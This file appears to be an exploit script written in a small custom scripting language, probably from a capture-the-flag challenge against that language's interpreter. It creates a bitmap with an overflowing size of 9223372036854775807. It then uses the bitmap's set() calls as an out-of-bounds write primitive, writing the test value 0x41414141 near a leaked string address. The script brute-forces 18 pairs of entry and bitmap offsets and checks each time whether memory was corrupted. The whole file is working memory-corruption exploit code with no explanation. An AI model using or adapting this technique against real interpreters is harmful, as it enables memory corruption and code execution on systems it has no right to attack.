print("=== Brute Force Address Finding ===");

int target = 0;
string target = "target";
int targetaddr = target;
print("Target string address:");
print(targetaddr);

print("Creating bitmap");
bitmap b1 = create(9223372036854775807, 2);

print("Testing multiple offset combinations...");
print("Writing test value 0x41414141 to each candidate");
print("Then reading back to see which one matches");


print("Test 1: entry_offset=-0x100, bitmap_offset=-1000");
int entry1 = targetaddr - 256;
int valueptr1 = entry1 + 40;
int bitmapptr1 = targetaddr -4096;
int offset1 = valueptr1 - bitmapptr1;
int bitindex1 = offset1 * 8;
print("bit_index:");
print(bitindex1);
set(b1, bitindex1 + 0, 0, 1);
set(b1, bitindex1 + 6, 0, 1);
set(b1, bitindex1 + 8, 0, 1);
set(b1, bitindex1 + 14, 0, 1);
set(b1, bitindex1 + 16, 0, 1);
set(b1, bitindex1 + 22, 0, 1);
set(b1, bitindex1 + 24, 0, 1);
set(b1, bitindex1 + 30, 0, 1);

int test1 = target;
print("test1:");
print(test1);
if (test1 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x100");
    print("bitmap_offset = -1000");
}

print("Test 2: entry_offset=-0x100, bitmap_offset=-2000");
int entry2 = targetaddr - 256;
int valueptr2 = entry2 + 40;
int bitmapptr2 = targetaddr -8192;
int offset2 = valueptr2 - bitmapptr2;
int bitindex2 = offset2 * 8;
print("bit_index:");
print(bitindex2);
set(b1, bitindex2 + 0, 0, 1);
set(b1, bitindex2 + 6, 0, 1);
set(b1, bitindex2 + 8, 0, 1);
set(b1, bitindex2 + 14, 0, 1);
set(b1, bitindex2 + 16, 0, 1);
set(b1, bitindex2 + 22, 0, 1);
set(b1, bitindex2 + 24, 0, 1);
set(b1, bitindex2 + 30, 0, 1);

int test2 = target;
print("test2:");
print(test2);
if (test2 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x100");
    print("bitmap_offset = -2000");
}

print("Test 3: entry_offset=-0x100, bitmap_offset=-3000");
int entry3 = targetaddr - 256;
int valueptr3 = entry3 + 40;
int bitmapptr3 = targetaddr -12288;
int offset3 = valueptr3 - bitmapptr3;
int bitindex3 = offset3 * 8;
print("bit_index:");
print(bitindex3);
set(b1, bitindex3 + 0, 0, 1);
set(b1, bitindex3 + 6, 0, 1);
set(b1, bitindex3 + 8, 0, 1);
set(b1, bitindex3 + 14, 0, 1);
set(b1, bitindex3 + 16, 0, 1);
set(b1, bitindex3 + 22, 0, 1);
set(b1, bitindex3 + 24, 0, 1);
set(b1, bitindex3 + 30, 0, 1);

int test3 = target;
print("test3:");
print(test3);
if (test3 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x100");
    print("bitmap_offset = -3000");
}

print("Test 4: entry_offset=-0x200, bitmap_offset=-1000");
int entry4 = targetaddr - 512;
int valueptr4 = entry4 + 40;
int bitmapptr4 = targetaddr -4096;
int offset4 = valueptr4 - bitmapptr4;
int bitindex4 = offset4 * 8;
print("bit_index:");
print(bitindex4);
set(b1, bitindex4 + 0, 0, 1);
set(b1, bitindex4 + 6, 0, 1);
set(b1, bitindex4 + 8, 0, 1);
set(b1, bitindex4 + 14, 0, 1);
set(b1, bitindex4 + 16, 0, 1);
set(b1, bitindex4 + 22, 0, 1);
set(b1, bitindex4 + 24, 0, 1);
set(b1, bitindex4 + 30, 0, 1);

int test4 = target;
print("test4:");
print(test4);
if (test4 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x200");
    print("bitmap_offset = -1000");
}

print("Test 5: entry_offset=-0x200, bitmap_offset=-2000");
int entry5 = targetaddr - 512;
int valueptr5 = entry5 + 40;
int bitmapptr5 = targetaddr -8192;
int offset5 = valueptr5 - bitmapptr5;
int bitindex5 = offset5 * 8;
print("bit_index:");
print(bitindex5);
set(b1, bitindex5 + 0, 0, 1);
set(b1, bitindex5 + 6, 0, 1);
set(b1, bitindex5 + 8, 0, 1);
set(b1, bitindex5 + 14, 0, 1);
set(b1, bitindex5 + 16, 0, 1);
set(b1, bitindex5 + 22, 0, 1);
set(b1, bitindex5 + 24, 0, 1);
set(b1, bitindex5 + 30, 0, 1);

int test5 = target;
print("test5:");
print(test5);
if (test5 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x200");
    print("bitmap_offset = -2000");
}

print("Test 6: entry_offset=-0x200, bitmap_offset=-3000");
int entry6 = targetaddr - 512;
int valueptr6 = entry6 + 40;
int bitmapptr6 = targetaddr -12288;
int offset6 = valueptr6 - bitmapptr6;
int bitindex6 = offset6 * 8;
print("bit_index:");
print(bitindex6);
set(b1, bitindex6 + 0, 0, 1);
set(b1, bitindex6 + 6, 0, 1);
set(b1, bitindex6 + 8, 0, 1);
set(b1, bitindex6 + 14, 0, 1);
set(b1, bitindex6 + 16, 0, 1);
set(b1, bitindex6 + 22, 0, 1);
set(b1, bitindex6 + 24, 0, 1);
set(b1, bitindex6 + 30, 0, 1);

int test6 = target;
print("test6:");
print(test6);
if (test6 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x200");
    print("bitmap_offset = -3000");
}

print("Test 7: entry_offset=-0x300, bitmap_offset=-1000");
int entry7 = targetaddr - 768;
int valueptr7 = entry7 + 40;
int bitmapptr7 = targetaddr -4096;
int offset7 = valueptr7 - bitmapptr7;
int bitindex7 = offset7 * 8;
print("bit_index:");
print(bitindex7);
set(b1, bitindex7 + 0, 0, 1);
set(b1, bitindex7 + 6, 0, 1);
set(b1, bitindex7 + 8, 0, 1);
set(b1, bitindex7 + 14, 0, 1);
set(b1, bitindex7 + 16, 0, 1);
set(b1, bitindex7 + 22, 0, 1);
set(b1, bitindex7 + 24, 0, 1);
set(b1, bitindex7 + 30, 0, 1);

int test7 = target;
print("test7:");
print(test7);
if (test7 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x300");
    print("bitmap_offset = -1000");
}

print("Test 8: entry_offset=-0x300, bitmap_offset=-2000");
int entry8 = targetaddr - 768;
int valueptr8 = entry8 + 40;
int bitmapptr8 = targetaddr -8192;
int offset8 = valueptr8 - bitmapptr8;
int bitindex8 = offset8 * 8;
print("bit_index:");
print(bitindex8);
set(b1, bitindex8 + 0, 0, 1);
set(b1, bitindex8 + 6, 0, 1);
set(b1, bitindex8 + 8, 0, 1);
set(b1, bitindex8 + 14, 0, 1);
set(b1, bitindex8 + 16, 0, 1);
set(b1, bitindex8 + 22, 0, 1);
set(b1, bitindex8 + 24, 0, 1);
set(b1, bitindex8 + 30, 0, 1);

int test8 = target;
print("test8:");
print(test8);
if (test8 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x300");
    print("bitmap_offset = -2000");
}

print("Test 9: entry_offset=-0x300, bitmap_offset=-3000");
int entry9 = targetaddr - 768;
int valueptr9 = entry9 + 40;
int bitmapptr9 = targetaddr -12288;
int offset9 = valueptr9 - bitmapptr9;
int bitindex9 = offset9 * 8;
print("bit_index:");
print(bitindex9);
set(b1, bitindex9 + 0, 0, 1);
set(b1, bitindex9 + 6, 0, 1);
set(b1, bitindex9 + 8, 0, 1);
set(b1, bitindex9 + 14, 0, 1);
set(b1, bitindex9 + 16, 0, 1);
set(b1, bitindex9 + 22, 0, 1);
set(b1, bitindex9 + 24, 0, 1);
set(b1, bitindex9 + 30, 0, 1);

int test9 = target;
print("test9:");
print(test9);
if (test9 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x300");
    print("bitmap_offset = -3000");
}

print("Test 10: entry_offset=-0x400, bitmap_offset=-1000");
int entry10 = targetaddr - 1024;
int valueptr10 = entry10 + 40;
int bitmapptr10 = targetaddr -4096;
int offset10 = valueptr10 - bitmapptr10;
int bitindex10 = offset10 * 8;
print("bit_index:");
print(bitindex10);
set(b1, bitindex10 + 0, 0, 1);
set(b1, bitindex10 + 6, 0, 1);
set(b1, bitindex10 + 8, 0, 1);
set(b1, bitindex10 + 14, 0, 1);
set(b1, bitindex10 + 16, 0, 1);
set(b1, bitindex10 + 22, 0, 1);
set(b1, bitindex10 + 24, 0, 1);
set(b1, bitindex10 + 30, 0, 1);

int test10 = target;
print("test10:");
print(test10);
if (test10 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x400");
    print("bitmap_offset = -1000");
}

print("Test 11: entry_offset=-0x400, bitmap_offset=-2000");
int entry11 = targetaddr - 1024;
int valueptr11 = entry11 + 40;
int bitmapptr11 = targetaddr -8192;
int offset11 = valueptr11 - bitmapptr11;
int bitindex11 = offset11 * 8;
print("bit_index:");
print(bitindex11);
set(b1, bitindex11 + 0, 0, 1);
set(b1, bitindex11 + 6, 0, 1);
set(b1, bitindex11 + 8, 0, 1);
set(b1, bitindex11 + 14, 0, 1);
set(b1, bitindex11 + 16, 0, 1);
set(b1, bitindex11 + 22, 0, 1);
set(b1, bitindex11 + 24, 0, 1);
set(b1, bitindex11 + 30, 0, 1);

int test11 = target;
print("test11:");
print(test11);
if (test11 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x400");
    print("bitmap_offset = -2000");
}

print("Test 12: entry_offset=-0x400, bitmap_offset=-3000");
int entry12 = targetaddr - 1024;
int valueptr12 = entry12 + 40;
int bitmapptr12 = targetaddr -12288;
int offset12 = valueptr12 - bitmapptr12;
int bitindex12 = offset12 * 8;
print("bit_index:");
print(bitindex12);
set(b1, bitindex12 + 0, 0, 1);
set(b1, bitindex12 + 6, 0, 1);
set(b1, bitindex12 + 8, 0, 1);
set(b1, bitindex12 + 14, 0, 1);
set(b1, bitindex12 + 16, 0, 1);
set(b1, bitindex12 + 22, 0, 1);
set(b1, bitindex12 + 24, 0, 1);
set(b1, bitindex12 + 30, 0, 1);

int test12 = target;
print("test12:");
print(test12);
if (test12 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x400");
    print("bitmap_offset = -3000");
}

print("Test 13: entry_offset=-0x500, bitmap_offset=-1000");
int entry13 = targetaddr - 1280;
int valueptr13 = entry13 + 40;
int bitmapptr13 = targetaddr -4096;
int offset13 = valueptr13 - bitmapptr13;
int bitindex13 = offset13 * 8;
print("bit_index:");
print(bitindex13);
set(b1, bitindex13 + 0, 0, 1);
set(b1, bitindex13 + 6, 0, 1);
set(b1, bitindex13 + 8, 0, 1);
set(b1, bitindex13 + 14, 0, 1);
set(b1, bitindex13 + 16, 0, 1);
set(b1, bitindex13 + 22, 0, 1);
set(b1, bitindex13 + 24, 0, 1);
set(b1, bitindex13 + 30, 0, 1);

int test13 = target;
print("test13:");
print(test13);
if (test13 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x500");
    print("bitmap_offset = -1000");
}

print("Test 14: entry_offset=-0x500, bitmap_offset=-2000");
int entry14 = targetaddr - 1280;
int valueptr14 = entry14 + 40;
int bitmapptr14 = targetaddr -8192;
int offset14 = valueptr14 - bitmapptr14;
int bitindex14 = offset14 * 8;
print("bit_index:");
print(bitindex14);
set(b1, bitindex14 + 0, 0, 1);
set(b1, bitindex14 + 6, 0, 1);
set(b1, bitindex14 + 8, 0, 1);
set(b1, bitindex14 + 14, 0, 1);
set(b1, bitindex14 + 16, 0, 1);
set(b1, bitindex14 + 22, 0, 1);
set(b1, bitindex14 + 24, 0, 1);
set(b1, bitindex14 + 30, 0, 1);

int test14 = target;
print("test14:");
print(test14);
if (test14 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x500");
    print("bitmap_offset = -2000");
}

print("Test 15: entry_offset=-0x500, bitmap_offset=-3000");
int entry15 = targetaddr - 1280;
int valueptr15 = entry15 + 40;
int bitmapptr15 = targetaddr -12288;
int offset15 = valueptr15 - bitmapptr15;
int bitindex15 = offset15 * 8;
print("bit_index:");
print(bitindex15);
set(b1, bitindex15 + 0, 0, 1);
set(b1, bitindex15 + 6, 0, 1);
set(b1, bitindex15 + 8, 0, 1);
set(b1, bitindex15 + 14, 0, 1);
set(b1, bitindex15 + 16, 0, 1);
set(b1, bitindex15 + 22, 0, 1);
set(b1, bitindex15 + 24, 0, 1);
set(b1, bitindex15 + 30, 0, 1);

int test15 = target;
print("test15:");
print(test15);
if (test15 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x500");
    print("bitmap_offset = -3000");
}

print("Test 16: entry_offset=-0x600, bitmap_offset=-1000");
int entry16 = targetaddr - 1536;
int valueptr16 = entry16 + 40;
int bitmapptr16 = targetaddr -4096;
int offset16 = valueptr16 - bitmapptr16;
int bitindex16 = offset16 * 8;
print("bit_index:");
print(bitindex16);
set(b1, bitindex16 + 0, 0, 1);
set(b1, bitindex16 + 6, 0, 1);
set(b1, bitindex16 + 8, 0, 1);
set(b1, bitindex16 + 14, 0, 1);
set(b1, bitindex16 + 16, 0, 1);
set(b1, bitindex16 + 22, 0, 1);
set(b1, bitindex16 + 24, 0, 1);
set(b1, bitindex16 + 30, 0, 1);

int test16 = target;
print("test16:");
print(test16);
if (test16 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x600");
    print("bitmap_offset = -1000");
}

print("Test 17: entry_offset=-0x600, bitmap_offset=-2000");
int entry17 = targetaddr - 1536;
int valueptr17 = entry17 + 40;
int bitmapptr17 = targetaddr -8192;
int offset17 = valueptr17 - bitmapptr17;
int bitindex17 = offset17 * 8;
print("bit_index:");
print(bitindex17);
set(b1, bitindex17 + 0, 0, 1);
set(b1, bitindex17 + 6, 0, 1);
set(b1, bitindex17 + 8, 0, 1);
set(b1, bitindex17 + 14, 0, 1);
set(b1, bitindex17 + 16, 0, 1);
set(b1, bitindex17 + 22, 0, 1);
set(b1, bitindex17 + 24, 0, 1);
set(b1, bitindex17 + 30, 0, 1);

int test17 = target;
print("test17:");
print(test17);
if (test17 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x600");
    print("bitmap_offset = -2000");
}

print("Test 18: entry_offset=-0x600, bitmap_offset=-3000");
int entry18 = targetaddr - 1536;
int valueptr18 = entry18 + 40;
int bitmapptr18 = targetaddr -12288;
int offset18 = valueptr18 - bitmapptr18;
int bitindex18 = offset18 * 8;
print("bit_index:");
print(bitindex18);
set(b1, bitindex18 + 0, 0, 1);
set(b1, bitindex18 + 6, 0, 1);
set(b1, bitindex18 + 8, 0, 1);
set(b1, bitindex18 + 14, 0, 1);
set(b1, bitindex18 + 16, 0, 1);
set(b1, bitindex18 + 22, 0, 1);
set(b1, bitindex18 + 24, 0, 1);
set(b1, bitindex18 + 30, 0, 1);

int test18 = target;
print("test18:");
print(test18);
if (test18 == 1094795585) {
    print("SUCCESS! Found correct offsets!");
    print("entry_offset = -0x600");
    print("bitmap_offset = -3000");
}

print("Brute force test completed");

